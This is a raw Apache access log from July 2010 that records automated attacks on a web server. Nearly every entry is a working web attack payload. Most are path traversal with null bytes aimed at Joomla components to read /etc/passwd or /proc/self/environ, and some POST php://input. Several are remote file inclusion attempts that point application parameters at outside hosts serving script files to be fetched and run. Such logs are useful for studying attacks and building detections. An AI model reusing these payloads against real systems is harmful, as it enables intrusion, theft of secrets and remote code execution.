203.147.62.92 - - [27/Jul/2010:20:43:08 +0200] "GET /logs//xmlrpc.php HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:20:43:17 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
207.46.204.172 - - [27/Jul/2010:20:45:18 +0200] "GET /?C=M;O=D HTTP/1.1" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
203.147.62.92 - - [27/Jul/2010:20:46:58 +0200] "GET /logs/error_log//xmlrpc.php HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:20:48:53 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:20:48:54 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
207.46.204.242 - - [27/Jul/2010:20:49:03 +0200] "GET /?C=N;O=D HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.125.208.51 - - [27/Jul/2010:20:57:02 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:03 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:03 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:03 +0200] "POST /logs/access_log//index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
220.125.208.51 - - [27/Jul/2010:20:57:04 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:04 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:05 +0200] "GET //index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:05 +0200] "POST //index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
220.125.208.51 - - [27/Jul/2010:20:57:05 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:06 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:06 +0200] "GET /logs//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:20:57:07 +0200] "POST /logs//index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
209.61.244.6 - - [27/Jul/2010:21:06:48 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.76"
12.222.201.130 - - [27/Jul/2010:21:14:35 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.836"
12.222.201.130 - - [27/Jul/2010:21:14:42 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.836"
94.23.215.207 - - [27/Jul/2010:21:22:13 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:13 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:15 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:15 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:37 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:37 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
174.123.133.162 - - [27/Jul/2010:21:28:40 +0200] "GET /logs//nfnaddressbook.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:21:28:40 +0200] "GET //nfnaddressbook.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:21:28:40 +0200] "GET /logs/access_log%20%20//nfnaddressbook.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 323 "-" "Mozilla/5.0"
174.123.133.162 - - [27/Jul/2010:21:34:45 +0200] "GET /logs/access_log//nfnaddressbook.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
204.15.125.1 - - [27/Jul/2010:21:35:13 +0200] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
91.83.64.16 - - [27/Jul/2010:21:39:33 +0200] "GET /logs/access_log/.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 350 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:21:39:33 +0200] "GET /.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 334 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:21:39:34 +0200] "GET /logs/.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 339 "-" "libwww-perl/5.831"
24.182.140.85 - - [27/Jul/2010:21:39:48 +0200] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.823"
195.199.244.244 - - [27/Jul/2010:21:41:21 +0200] "GET /.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 334 "-" "libwww-perl/5.830"
195.199.244.244 - - [27/Jul/2010:21:41:21 +0200] "GET /.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 334 "-" "libwww-perl/5.830"
66.71.245.122 - - [27/Jul/2010:21:45:26 +0200] "GET /logs/*.?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:45:26 +0200] "GET /*.?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:46:10 +0200] "GET /*.?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:46:10 +0200] "GET /*.?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:47:08 +0200] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:47:08 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:47:08 +0200] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:47:08 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
84.217.73.155 - - [27/Jul/2010:21:49:32 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
217.65.2.151 - - [27/Jul/2010:21:49:35 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
208.38.36.33 - - [27/Jul/2010:21:50:36 +0200] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
65.13.185.104 - - [27/Jul/2010:21:51:22 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
195.199.244.244 - - [27/Jul/2010:21:55:54 +0200] "GET /logs/.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 339 "-" "libwww-perl/5.830"
195.199.244.244 - - [27/Jul/2010:21:55:54 +0200] "GET /.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 334 "-" "libwww-perl/5.830"
195.199.244.244 - - [27/Jul/2010:21:57:11 +0200] "GET /logs/.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 339 "-" "libwww-perl/5.830"
195.199.244.244 - - [27/Jul/2010:21:57:11 +0200] "GET /.scanhttp://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 334 "-" "libwww-perl/5.830"
69.175.118.101 - - [27/Jul/2010:21:59:28 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:21:59:28 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:21:59:29 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:02:33 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:02:33 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:02:33 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
209.61.244.6 - - [27/Jul/2010:22:04:47 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.76"
209.61.244.6 - - [27/Jul/2010:22:04:47 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.76"
209.61.244.6 - - [27/Jul/2010:22:04:47 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.76"
217.65.2.151 - - [27/Jul/2010:22:05:26 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:22:05:26 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:22:05:26 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
69.175.118.101 - - [27/Jul/2010:22:06:26 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:06:26 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:06:27 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
98.130.2.13 - - [27/Jul/2010:22:12:19 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:22:12:24 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
84.217.73.155 - - [27/Jul/2010:22:13:51 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:22:13:51 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:22:13:52 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
65.13.185.104 - - [27/Jul/2010:22:15:46 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:22:15:47 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:22:15:47 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /index.php?option=com_janews&controller=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 295 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /logs/access_log/index.php?option=com_janews&controller=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /logs/index.php?option=com_janews&controller=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /logs/access_log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:11 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:12 +0200] "GET /logs/access_log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:12 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:12 +0200] "GET /logs/access_log/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.49.129.27 - - [27/Jul/2010:22:18:12 +0200] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.118.101 - - [27/Jul/2010:22:18:14 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:18:14 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:22:18:14 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
83.165.195.143 - - [27/Jul/2010:22:25:11 +0200] "GET /logs/access_log HTTP/1.0" 200 518873 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
168.143.19.89 - - [27/Jul/2010:22:32:15 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.825"
212.13.195.84 - - [27/Jul/2010:22:33:31 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
178.162.133.106 - - [27/Jul/2010:22:33:59 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [27/Jul/2010:22:33:59 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
202.160.123.72 - - [27/Jul/2010:22:34:59 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:22:34:59 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
178.162.133.106 - - [27/Jul/2010:22:35:21 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [27/Jul/2010:22:35:21 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
66.71.245.122 - - [27/Jul/2010:22:35:30 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:35:30 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
207.46.13.54 - - [27/Jul/2010:22:36:29 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.160.123.72 - - [27/Jul/2010:22:36:40 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:22:36:41 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
207.46.13.54 - - [27/Jul/2010:22:37:31 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
12.222.201.130 - - [27/Jul/2010:22:39:08 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.836"
12.222.201.130 - - [27/Jul/2010:22:39:08 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.836"
12.222.201.130 - - [27/Jul/2010:22:39:08 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.836"
12.222.201.130 - - [27/Jul/2010:22:39:23 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.836"
12.222.201.130 - - [27/Jul/2010:22:39:23 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.836"
12.222.201.130 - - [27/Jul/2010:22:39:24 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.836"
212.13.195.84 - - [27/Jul/2010:22:42:41 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
212.13.195.84 - - [27/Jul/2010:22:42:41 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
212.13.195.84 - - [27/Jul/2010:22:42:41 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
168.143.19.89 - - [27/Jul/2010:22:43:11 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.825"
168.143.19.89 - - [27/Jul/2010:22:43:11 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.825" 168